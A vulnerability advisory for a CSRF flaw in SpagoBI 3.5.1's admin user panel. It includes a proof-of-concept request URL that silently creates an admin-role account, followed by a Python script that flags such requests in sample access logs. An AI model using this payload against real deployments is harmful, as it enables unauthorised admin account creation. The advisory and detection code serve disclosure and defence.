# CVE-2024-54792

**Severity:** **Medium** (**6.1**)

**CVSS score:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`

## Summary

Engineering Ingegneria Informatica **SpagoBI** version **3.5.1** is affected by **CSRF** in the admin panel that manages user grants.

## PoC

The add/edit/delete user panel, accessible to the admin user, contains no CSRF countermeasures.

### Steps to Reproduce

1. Embed this URL, customized with the **host**, **custom_username** and **custom_password**, into an HTML page that makes the request, and trick a victim with admin rights who is logged into the platform into visiting that page. A new user will be created in the platform.

   ```
   https:///SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&SBI_EXECUTION_ID=-1&LIGHT_NAVIGATOR_DISABLED=TRUE&MESSAGE_DET=USER_INSERT&_dc=1727100301044&userId=&fullName=&id=0&pwd=&userRoles=%5B%7B%22name%22%3A%22%2Fspagobi%2Fadmin%22%2C%22id%22%3A5%2C%22description%22%3A%22%2Fspagobi%2Fadmin%22%2C%22checked%22%3Atrue%7D%5D&userAttributes=%5B%5D
   ```

## Affected Version Details

- <= 3.5.1

## Impact

Because the user-management action lacks CSRF countermeasures, the attacker can trick a victim logged in with admin rights into performing a GET request that inserts a user with attacker-chosen credentials into the platform without the victim's knowledge. The attacker can then log in with the credentials they selected.

## Mitigation

- Update to the latest version.

## References

- https://nvd.nist.gov/vuln/detail/CVE-2024-54792
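Until the upgrade is applied, the user-insert request described above is visible in ordinary web-server access logs: a state-changing `MANAGE_USER_ACTION` / `USER_INSERT` request that arrives via GET with a missing or foreign `Referer` is the CSRF pattern to hunt for. The following detection script is an added example and not part of this advisory; the log lines, the `bi.example.org` deployment origin and the combined-log format are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache/nginx "combined" format), not real SpagoBI logs.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Sep/2024:14:05:01 +0000] "GET /SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&MESSAGE_DET=USER_INSERT&userId=biadmin2&fullName=x&id=0&pwd=P%40ss HTTP/1.1" 200 512 "https://evil.example/lure.html" "Mozilla/5.0"
203.0.113.8 - - [24/Sep/2024:14:06:22 +0000] "GET /SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&MESSAGE_DET=USER_INSERT&userId=alice&fullName=Alice&id=0&pwd=x HTTP/1.1" 200 512 "https://bi.example.org/SpagoBI/servlet/AdapterHTTP?PAGE=UserManagement" "Mozilla/5.0"
203.0.113.9 - - [24/Sep/2024:14:07:45 +0000] "GET /SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&MESSAGE_DET=USER_INSERT&userId=bob&fullName=Bob&id=0&pwd=x HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [24/Sep/2024:14:08:10 +0000] "GET /SpagoBI/servlet/AdapterHTTP?ACTION_NAME=EXECUTE_DOCUMENT_ACTION&OBJECT_ID=42 HTTP/1.1" 200 9000 "https://bi.example.org/SpagoBI/" "Mozilla/5.0"
"""

TRUSTED_ORIGIN = "https://bi.example.org"  # assumed scheme://host of the SpagoBI deployment

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def is_user_insert(target):
    """True if the request target is the AdapterHTTP user-insert action from the advisory."""
    parts = urlsplit(target)
    if not parts.path.endswith("/SpagoBI/servlet/AdapterHTTP"):
        return False
    q = parse_qs(parts.query)
    # Only USER_INSERT is documented in the advisory; widen the set once the
    # MESSAGE_DET values of the edit/delete actions are confirmed from the deployment.
    return q.get("ACTION_NAME") == ["MANAGE_USER_ACTION"] and q.get("MESSAGE_DET") == ["USER_INSERT"]

def referer_origin(referer):
    """Return scheme://host of the Referer, or None when the header is absent ('-' in logs)."""
    if referer in ("", "-"):
        return None
    p = urlsplit(referer)
    return f"{p.scheme}://{p.netloc}"

def find_suspicious(log_text, trusted_origin=TRUSTED_ORIGIN):
    """Flag user-insert requests whose Referer is missing or not the trusted SpagoBI origin."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not is_user_insert(m["target"]):
            continue
        origin = referer_origin(m["referer"])
        if origin == trusted_origin:
            continue  # same-origin request from the real admin UI: expected traffic
        q = parse_qs(urlsplit(m["target"]).query)
        hits.append({"ip": m["ip"], "ts": m["ts"], "user": q.get("userId", [""])[0],
                     "referer_origin": origin or "missing"})
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

A hit whose `userId` does not appear in the admin team's change records is the signal to disable that account and check who was logged in as admin at the time.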